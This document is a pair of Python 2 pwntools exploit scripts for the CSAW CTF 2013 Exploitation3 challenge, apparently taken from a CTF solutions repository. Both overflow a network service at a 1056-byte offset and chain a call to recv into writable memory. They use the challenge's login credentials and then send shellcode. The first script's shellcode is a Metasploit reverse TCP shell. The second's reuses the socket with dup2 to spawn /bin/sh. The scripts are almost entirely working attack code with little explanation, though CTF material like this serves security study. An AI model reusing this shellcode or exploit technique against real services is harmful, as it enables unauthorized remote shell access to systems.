exploit.py

#!/usr/bin/env python2

# CSAW CTF Qualification Round 2013: Exploitation3
# http://shell-storm.org/repo/CTF/CSAW-2013/Exploitation/

from pwn import *

# gdb-peda$ patto 0x476e4131
# 1198407985 found at offset: 1056
padding = 1056

addr_bss = 0x804b008

# 08048890 <recv@plt>:
#  8048890:	ff 25 f0 af 04 08    	jmp    DWORD PTR ds:0x804aff0
#  8048896:	68 e0 00 00 00       	push   0xe0
#  804889b:	e9 20 fe ff ff       	jmp    80486c0 <setsockopt@plt-0x10>
addr_recv_plt = 0x8048890

# msf > use payload/linux/x86/shell_reverse_tcp 
# msf payload(shell_reverse_tcp) > generate -t python -o LHOST='0.0.0.0'
shellcode =  ''
shellcode += '\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66'
shellcode += '\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x00'
shellcode += '\x00\x00\x00\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50'
shellcode += '\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73'
shellcode += '\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0'
shellcode += '\x0b\xcd\x80'

r = remote('localhost', 34266)

# login
r.recvuntil('UserName: ')
r.sendline('csaw2013')
r.recvuntil('Password: ')
r.sendline('S1mplePWD')

r.recvuntil('Entry Info: ')
r.sendline('-1')

payload = ''
payload += 'A' * padding
payload += p32(addr_recv_plt)
payload += p32(addr_bss)
payload += p32(4)
payload += p32(addr_bss)
payload += p32(len(shellcode))
payload += p32(0)
r.send(payload)

r.clean()

r.send(shellcode)
r.interactive()

exploit2.py

#!/usr/bin/env python2

# CSAW CTF Qualification Round 2013: Exploitation3
# http://shell-storm.org/repo/CTF/CSAW-2013/Exploitation/

from pwn import *

# gdb-peda$ patto 0x476e4131
# 1198407985 found at offset: 1056
padding = 1056

addr_bss = 0x804b008

# 08048890 <recv@plt>:
#  8048890:	ff 25 f0 af 04 08    	jmp    DWORD PTR ds:0x804aff0
#  8048896:	68 e0 00 00 00       	push   0xe0
#  804889b:	e9 20 fe ff ff       	jmp    80486c0 <setsockopt@plt-0x10>
addr_recv_plt = 0x8048890

socket_fd = 4

shellcode =  ''

# dup2(fd,0); dup2(fd,1); dup2(fd,2);
# http://shell-storm.org/shellcode/files/shellcode-259.php
shellcode += '\x31\xc9'                     # xor    %ecx,%ecx
# shellcode += '\x56'                         # push   %esi
# shellcode += '\x5b'                         # pop    %ebx
shellcode += '\x8d\x59' + chr(socket_fd)    # lea ebx, [ecx + socket_fd]
# loop:
shellcode += '\x6a\x3f'                     # push   $0x3f
shellcode += '\x58'                         # pop    %eax
shellcode += '\xcd\x80'                     # int    $0x80
shellcode += '\x41'                         # inc    %ecx
shellcode += '\x80\xf9\x03'                 # cmp    $0x3,%cl
shellcode += '\x75\xf5'                     # jne    80483e8 <loop>

# msf > use payload/linux/x86/exec 
# msf payload(exec) > generate -b '\x00' -t python -o CMD=/bin/sh
shellcode += '\xbb\x55\x28\xf8\x3d\xdd\xc5\xd9\x74\x24\xf4\x5d\x33'
shellcode += '\xc9\xb1\x0b\x31\x5d\x15\x83\xed\xfc\x03\x5d\x11\xe2'
shellcode += '\xa0\x42\xf3\x65\xd3\xc1\x65\xfe\xce\x86\xe0\x19\x78'
shellcode += '\x66\x80\x8d\x78\x10\x49\x2c\x11\x8e\x1c\x53\xb3\xa6'
shellcode += '\x17\x94\x33\x37\x07\xf6\x5a\x59\x78\x85\xf4\xa5\xd1'
shellcode += '\x3a\x8d\x47\x10\x3c'

r = remote('localhost', 34266)

# login
r.recvuntil('UserName: ')
r.sendline('csaw2013')
r.recvuntil('Password: ')
r.sendline('S1mplePWD')

r.recvuntil('Entry Info: ')
r.sendline('-1')

payload = ''
payload += 'A' * padding
payload += p32(addr_recv_plt)
payload += p32(addr_bss)
payload += p32(socket_fd)
payload += p32(addr_bss)
payload += p32(len(shellcode))
payload += p32(0)
r.send(payload)

r.clean()

r.send(shellcode)
r.interactive()